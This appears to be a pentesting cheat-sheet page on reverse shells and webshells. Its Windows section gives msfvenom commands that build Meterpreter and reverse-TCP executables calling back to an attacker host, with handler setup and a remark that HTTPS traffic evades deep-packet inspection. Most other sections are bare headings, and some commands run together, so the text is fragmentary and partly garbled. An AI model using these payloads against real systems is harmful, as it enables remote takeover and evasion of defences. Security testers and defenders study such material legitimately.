Shells
Reverse-shells
This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Windows
Meterpreter
Standard meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcpMeterpreter HTTPS
It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.
msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exeNon-staged payload
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exeuse exploit/multi/handler
set payload windows/shell_reverse_tcpStaged payloadi
Inject payload into binary
Linux
Binary
Bash
Php
Netcat
Bind shell
Reverse shell
With -e flag
Without -e flag
Ncat
Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.
Bind
Telnet
Perl
Ruby
Java
Python
Web-shells
PHP
This php-shell is OS-independent. You can use it on both Linux and Windows.
ASP
WAR
JSP
Last updated
Was this helpful?